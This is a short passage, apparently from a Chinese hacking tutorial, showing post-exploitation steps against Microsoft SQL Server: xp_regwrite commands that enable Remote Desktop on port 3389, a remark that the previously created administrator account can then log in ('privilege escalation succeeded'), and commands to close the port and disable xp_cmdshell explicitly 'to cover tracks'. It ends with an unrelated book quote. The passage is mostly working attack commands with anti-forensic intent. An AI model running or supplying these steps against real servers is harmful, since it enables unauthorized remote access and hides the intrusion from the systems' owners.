开启 3389 端口:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections', 'REG_DWORD', 0; --

然后就可以通过创建的管理员账号以及打开的 3389 端口进行远程桌面登录,提权成功。

之后为了掩盖踪迹可以关闭 3389 端口,以及删除添加的组件:

关闭 3389:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections', 'REG_DWORD', 1; --

删除组件:

EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 0
GO
RECONFIGURE
GO

人们在一眨眼间做出的 决策,其内涵远比表相 来的复杂。 《Bink眨眼之间》